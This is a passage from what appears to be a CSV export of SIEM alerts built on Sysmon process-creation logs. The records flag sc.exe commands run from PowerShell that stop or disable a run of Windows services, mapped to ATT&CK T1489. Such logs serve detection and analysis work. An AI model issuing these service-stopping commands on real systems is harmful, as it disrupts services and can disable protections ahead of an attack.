Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.213",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.835 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001017062600} +ProcessId: 4348 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.838128200Z"",""eventRecordID"":""2906"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.835\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001017062600}\r\nProcessId: 4348\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.835"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001017062600}"",""processId"":""4348"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.165",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.794 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001055002600} +ProcessId: 4436 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.796855700Z"",""eventRecordID"":""2903"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.794\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001055002600}\r\nProcessId: 4436\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.794"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001055002600}"",""processId"":""4436"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.975",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.740 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-00107efb2500} +ProcessId: 8008 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.743011000Z"",""eventRecordID"":""2900"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.740\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-00107efb2500}\r\nProcessId: 8008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.740"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-00107efb2500}"",""processId"":""8008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.953",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.721 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a9f92500} +ProcessId: 3524 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Nationalaie Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Nationalaie Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.727800200Z"",""eventRecordID"":""2899"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.721\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a9f92500}\r\nProcessId: 3524\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Nationalaie Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.721"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010a9f92500}"",""processId"":""3524"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Nationalaie Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.909",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.655 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d4f72500} +ProcessId: 3440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.672286500Z"",""eventRecordID"":""2897"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.655\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d4f72500}\r\nProcessId: 3440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.655"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010d4f72500}"",""processId"":""3440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.795",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.591 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001024f52500} +ProcessId: 1996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.593613900Z"",""eventRecordID"":""2894"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.591\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001024f52500}\r\nProcessId: 1996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.591"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001024f52500}"",""processId"":""1996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.749",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.556 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001023f12500} +ProcessId: 3816 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: 